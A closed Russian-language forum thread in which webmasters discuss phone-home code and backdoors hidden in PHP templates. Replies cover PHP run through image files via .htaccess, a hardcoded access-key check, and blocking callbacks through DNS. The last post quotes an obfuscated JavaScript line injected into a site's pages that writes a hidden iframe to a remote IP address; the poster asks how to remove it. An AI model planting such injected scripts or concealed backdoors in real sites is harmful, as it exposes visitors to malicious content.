Стучалки в скриптах

Статус
В этой теме нельзя размещать новые ответы.
Кстати, как может быть стучалка в картинке?

Может ли так быть, что в обычной графике, которая отображет иконки, кнопки - быть встроен php скрипт?

Мне кажется, что можно только имитировать картинку, а не вставлять туда черт знает что без потери графики.
 
Кстати, как может быть стучалка в картинке?
Варианты:
1. Просто смотрим логи сервера(указано откуда обращение)
2. Картинка обрабатывается как php файл(с помощью настроек .htaccess) и в итоге получаем детальную инфу- IP, сервер, дира, имя вызвавшего скрипта. Да в принципе всё что угодно. В паблик шаблонах часто таким обрахом встраивают бекдоры, левые ссылки и т.д.
 
Привет всем!

Есть код:

HTML:
if ( !empty( $A_PCODE ) )
                                {
                                    if ( !( $A_PCODE == "p3236131b1da70" ) )
                                    {
                                        break;
                                    }
                                    A::$OBSERVER->Event( "Action", $_REQUEST['action'] );
                                    A::$MAINFRAME->Action( $_REQUEST['action']
);


Подскажите, что такое может быть $A_PCODE и цифры, которые написаны?

Я думаю стучалка, проверка ключа ли или просто безопасный вход?
 
Привет всем!

Есть код:

HTML:
if ( !empty( $A_PCODE ) )
                                {
                                    if ( !( $A_PCODE == "p3236131b1da70" ) )
                                    {
                                        break;
                                    }
                                    A::$OBSERVER->Event( "Action", $_REQUEST['action'] );
                                    A::$MAINFRAME->Action( $_REQUEST['action'] );


Подскажите, что такое может быть $A_PCODE и цифры, которые написаны?

Я думаю стучалка, проверка ключа ли или просто безопасный вход?
функции
PHP:
A::$OBSERVER->Event( "Action", $_REQUEST['action'] );
                                    A::$MAINFRAME->Action( $_REQUEST['action'] );
будут вызваны только если значение в $A_PCODE- валидное. Это скорее урезание функционала. Хотя может быть и стучалкой- если эти вызываемые функции генерируют что-то, кторое в последующем проверяется.
 
Спасибо за ответ! Я заметил, что в каждом php файле присутствуют такие строки. В этом сайте есть функция протокола https. Возможно что это числовое значение служит шифром?
 
А ведь можно стучалку под zend спрятать, тогда её вообще никак нереально блокировать?
 
Возможно что это числовое значение служит шифром?
Как Вам ответил KillDead - данный код на человеко-русский язык расшифровывается так:
PHP:
if ( !empty( $A_PCODE ) ) // код начинает выполняться, если не пустая переменная $A_PCODE
                                {
                                    if ( !( $A_PCODE == "p3236131b1da70" ) ) // если переменная $A_PCODE не равна p3236131b1da70
                                    {
                                        // то код прерывается, иначе
                                        break;
                                    }
                                    // выполняется код
                                    A::$OBSERVER->Event( "Action", $_REQUEST['action'] );
                                    A::$MAINFRAME->Action( $_REQUEST['action'] );
Что заложено в последние две функции - хз. Надо все смотреть.

Добавлено через 2 минуты
А ведь можно стучалку под zend спрятать, тогда её вообще никак нереально блокировать?
Можно раззендить... или локализовать адрес, куда стучалка стучит...
Например, стучит она по адресу bla.ru - значит пишем в свои днс, что bla.ru это localhost и пусть стучит себе на здоровье.
 
Скажите, проверки HTTPAnalyzer'ом достаточно для того чтобы убедиться в отсутствии стучалок?
 
Скажите, проверки HTTPAnalyzer'ом достаточно для того чтобы убедиться в отсутствии стучалок?
Если стучалка будет работать на портах, отличных от 80 и 443, то HTTPAnalyzer её не увидит. Для полного анализа трафика подойдёт Wireshark.
Но такое, имхо, большая редкость.
 
  • Нравится
Реакции: bvb
у меня в самом низу (после < / html> странички (DLE) в коде вот это:
Код:
<script language='JavaScript'>n=0;while(n<199)document.write(String.fromCharCode('=ubcmf!xjeui>(1(!cpsefs>(1(?=us!ifjhiu>(1qy(?=ue?=ejw!tuzmf>(pwfsgmpx;tdspmm<!ifjhiu;1qy<!xjeui;1qy(?=jgsbnf!tsd>(iuuq;00324/266/31/20ufoyy0(!xjeui>(47(!ifjhiu>(23(?=0jgsbnf?=0ejw?=0ue?=0us?=0ubcmf?'.charCodeAt(n++)-1))</script>

что это? в шаблоне удилил, но в страничке этот код появляется...
подскажите - откуда его удалить насовсем?
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху